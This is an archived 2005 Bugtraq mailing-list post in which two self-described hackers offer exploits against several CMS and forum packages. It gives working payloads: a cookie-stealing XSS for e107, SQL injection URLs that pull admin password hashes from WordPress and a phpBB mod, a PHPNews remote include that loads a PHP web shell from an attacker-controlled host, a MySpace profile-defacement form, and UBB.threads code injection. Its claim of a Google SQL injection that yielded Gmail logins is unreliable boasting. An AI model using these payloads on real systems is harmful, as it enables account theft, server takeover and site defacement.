Multiple CMS/Forum Vulnablilties

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple CMS/Forum Vulnablilties
From: "pacifico\", 0] //--></script>a" <jbiaso@xxxxxxxxx>
Date: Sat, 27 Aug 2005 20:36:10 -0400
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=bTeVOyjxBSRjPXNpZ5+WJLIYvb1XE6exE0B6L9zIQipNyMAfOYry6ZoPVPzS6V9zxeysfrX9sWMtWyDvSRk7+W2g2edsrP9dH6CBE617APp7zGgDH0PCSiUjhyG7IWShphO+JpPUxArTgOABUeFpzszDBUjRU0lK6PBgmkchrAY=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: jbiaso@xxxxxxxxxxxx

#################################
# Multi-CMS/Forum Vulnability's #
#     Found by ap0c hackers     #
#      pacifico & ratboy        #
#################################

Yo! Ok, well a couple new vulnabilitys have been found by.. us :)

------------------
First; e107 xss---
------------------

 [link=http://w000000w00tw00t/asdadLI[link=
onMouseOver='alert(document.cookie);' h1d3="]<[size=24]HIGHLIGHT
ME!!11!1!!!!!1111!!!!!!11!!1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![/size]>[/link][link=h1d3me=']][/link][/link]
 
Enter this into any message, signature, et cetra, and when highlighted
it will alert with the users cookie. This *may* be furtherly
exploitable; but we are not sure; as we've been very busy ;)

------
next; wordpress blog sql injection ---
------

http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*

This will give the administrator hash for the wordpress blog/CMS. We
have also found that if you spoof you're browser to something like:
<?php phpinfo(); ?>, and have a failed login attempt; it is eval'd,
and you can execute your own code.

------
Now; PHPNews latest release remote include(); exploit
------

http://path/to/php/news/auth.php?path=http://path/to/exploit/&c=uname%20-a

Ok, now you'll need a host, and change (http://path/to/exploit/) to
your host. Now, you will make a directory called "languages". Then in
a file named "en_GB.admin.lng", put something like this code:

<?php 
$rawr=$_GET['c'];
echo(`$rawr`);
?>

kthx.


-----
And; Knoledge Base PHPBB Mod SQL Injection Exploit
-----

Righto.. so you find a phpbb forum that says: 'Powered by Knowledge
Base MOD, wGEric & Haplo (c) 2002-2005' at the bottem, eh?

Now, this is totally vulnable. (the mod changes the index.php to kb.php)
http://path/to/forum/kb.php?mode=article&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMIT%201/*%20&rush=%00

:)


-----
!!!!!!Google.com!!!!!SQL!!!!!Injection!!!!!Exploit!!!!!!
-----

Ok, we expect this to be fixed right away, so be sure to do it quick ;)
Giving google the query: 
-b: *++*' UNION SELECT ass,ass from ASS,ass%00/*
Cause's an error of "database gm-google.ass does not exist". We've
gotten a few user/pass's for gmail with this ;)
This is done by confusing googles "calculator", so it does *NOT* check
the query to make sure its valid.

You'd be suprised how insecure google is; when looked at closly. We
also had a bindshell; but they found out; and thats fixed now.


-----
MySpace.com User Profile Defacement.
-----

Once again, this may be fixed very soon.
This code should be efficent;

<?php 
$g1=$_GET['t'];
$g2=$_GET['f'];

echo('
        <form action="http://myspace.com/index.cfm?fuseaction=user.addComment";
method="post" name="commentForm">
                        
                                <input type="hidden" name="hashcode"
value="MIGKBgkrBgEEAYI3WAOgfTB7BgorBgEEAYI3WAMBoG0wawIDAgABAgJmAwICAMAECGU6VlkoYLOqBBCZiLLKnlWybUUua3SB/xxzBED1fsg4c0zRcY4B8IWZgNbTdYkd/pUk6zpuLXZZAhwC+oxKfrwgQfy+Qnj7XB4pXWTRvgumgCUHsjtspz8/kt6a">
                        <input type="hidden" name="FriendID" value="' . $f . 
'24822493">
                        <input type=hidden name=Mytoken value=' . $t . '>

');

echo ('
<input type="hidden" name="f_comments"
value='%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTD%3E%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTABLE%3E%3CTR%3E%3Cimg%20src%3D%22http%3A%2F%2Flemonparty.org%2Flemonparty.jpg%22%3E%3CFONT%20SIZE%3D%2224%22%20COLOR%3D%22RED%22%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22down%22%3Eowned.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22left%22%3Eby.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22up%22%3Eap0c.%3C%2Fmarquee%3E%3CBR%3E%3Cnoscript%3E'>

                        
                        
                        <input type="submit" value="Post Comment" 
onClick="this.disabled =
true; document.commentForm.submit();">
                        </form>
');
?>

example url: http://localhost/myspace0wn.php?t=20050827111256&f=6617

This would deface profile 6617 if the (t) variable is that users friend.

ktx.

-----
Forums ("UBB.threads™ 6.3.2") Remote Code Execution.
-----

These boards are very popular among corporate sites (*cough*NBC,CNN*cough*)
http://bo**ds.n**.***/bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post

This would execute phpinfo(); on the victims server.

##########################
##  Thats all for this  ##
##   "issue" of sweet   ##
##  sploits... sincerly ##
##  pacifico and ratboy ##
##########################
Contact? jbiaso@xxxxxxxxx

-EOF-

Prev by Date: FUD Forum < 2.7.1 PHP code injection vurnelability
Next by Date: [cosmoshop <= 8.10.78] be the shopadmin in one step
Previous by thread: Re: FUD Forum < 2.7.1 PHP code injection vurnelability
Next by thread: [cosmoshop <= 8.10.78] be the shopadmin in one step
Index(es):
- Date
- Thread